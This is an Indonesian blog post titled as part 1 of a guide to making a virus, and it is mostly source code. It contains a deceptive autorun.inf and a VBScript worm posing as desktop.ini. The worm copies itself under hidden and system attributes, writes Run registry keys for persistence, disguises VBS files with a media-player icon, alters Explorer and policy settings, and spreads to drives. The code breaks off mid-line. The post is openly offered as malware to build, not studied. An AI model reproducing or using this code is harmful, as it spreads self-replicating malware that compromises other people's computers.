Social Icons

Pages

04/10/09

Mari membuat virus part 1

Sama seperti pembahasan sebelumnya mari kita buat virus kembali, dari script virus cabulxx. Yang sedikit modifikasi.. Tahap pertama membuat virus adalah kita harus memiliki autorun.. Nah dibawah ini script autorunnya,

script begin
----------------------

[autorun]
shellexecute=wscript.exe //e:VBScript dasktop.ini auto
action=Open folder to view file
shell\open\command=wscript.exe //e:VBScript dasktop.ini auto
icon=%systemroot%\shell32.dll,4

file ini sebagai autorun file samaran file asli windows destop.ini yang disamarkan jadi dastop.ini. Copy paste file diatas save as allfile save sebagai autorun.inf

nah dibwh ini scrit destop.INI palsu

script begin
----------------------

on error resume next
set fs=createobject("scripting.filesystemobject")
set b3b15cR17T=fs.getfile(wscript.scriptfullname)

b3b15cR17Trn="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"action=Open folder to view file"&vbcrlf&"shell\open\command=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"icon=%systemroot%\shell32.dll,4"

set b3b15cR17Ttx=b3b15cR17T.openastextstream(1,-2)


do while not b3b15cR17Ttx.atendofstream
b3b15cR17Tv=b3b15cR17Tv&b3b15cR17Ttx.readline
b3b15cR17Tv=b3b15cR17Tv&vbcrlf
loop

do

set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=32

set my63615cR1p7=fs.createtextfile(b3b15cR17Th &"\myName.bat")
my63615cR1p7.writeline "@echo off"
my63615cR1p7.writeline "echo ######### ## ## ## ##### ### ########### ########"
my63615cR1p7.writeline "echo ############ ## ### #### ####### #### ######## ##########"
my63615cR1p7.writeline "echo ## ### ## ## ##### #### # ##"
my63615cR1p7.writeline "echo ## ## ## ## ###### #### # ##"
my63615cR1p7.writeline "echo ### ### ## ## ## ###### #### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ## ## ### ####"
my63615cR1p7.writeline "echo ## ## ######### #### ## ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ####### # ##"
my63615cR1p7.writeline "echo ### ### ## ###### ## #### ### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## # ####"
my63615cR1p7.writeline "echo ############ ########## #### #### ####"
my63615cR1p7.writeline "echo ######### ####### ### ########"
my63615cR1p7.writeline "maafkan aku mencintaimu [verion: 21-09-2009]"
my63615cR1p7.writeline "pause"
my63615cR1p7.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=39
set DB5cR1p7x93nT=createobject("WScript.Shell")
docf=DB5cR1p7x93nT.specialfolders("MyDocuments")
sCr1p7x93nT3v1L=docf & "\dian sastrowardoyo"
if not fs.folderexists(sCr1p7x93nT3v1L) then
set crfolder=fs.createfolder(sCr1p7x93nT3v1L)
end if

set b3b15cR17Tfn=fs.createtextfile(sCr1p7x93nT3v1L & "\midori.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close


set DB5cR1p7x93nT = createobject("WScript.Shell")
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winsoc","c:\Windows\winsoc.vbs","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xGentn4m3","c:\Windows\myName.bat","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","C:\Program Files\Windows Media Player\wmplayer.exe,1","REG_SZ"

almreg = "HKCU\Software\Policies\Microsoft\Windows\System\"
DB5cR1p7x93nT.RegWrite almreg & "DisableCMD","0", "REG_DWORD"

almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableTaskMgr","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableMsConfig","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableRegistryToo0s","0","REG_DWORD"

DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\Hidden","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\HideFileExt","0","REG_DWORD"
DB5cR1p7x93nT.Regwrite almreg & "Explorer\Advanced\ShowSuperHidden","0x00000001"

almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"
DB5cR1p7x93nT.RegWrite almreg & "NoRun", "0", "REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "NoFolderOptions", "0", "REG_DWORD"

set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")

b3b15cR17Tfn.attributes=32

set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Th &"\winsoc.vbs")

b3b15cR17Tfn.write b3b15cR17Tv

b3b15cR17Tfn.close



set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")

b3b15cR17Tfn.attributes=39

set b3b15cR17Twsl=createobject("wscript.shell")

b3b15cR17Tdc=b3b15cR17Twsl.specialfolders("MyDocuments")

set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdc &"\diansastro.vbs")

b3b15cR17Tfn.write b3b15cR17Tv

b3b15cR17Tfn.close



for each b3b15cR17Tdrive in fs.drives

if (b3b15cR17Tdrive.drivetype=1 or b3b15cR17Tdrive.drivetype=2) and b3b15cR17Tdrive.path<>"A:" then

set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\dasktop.ini")

b3b15cR17Tfn.attributes=32

set b3b15cR17Tfn=fs.cre

Tidak ada komentar:

 
Blogger Templates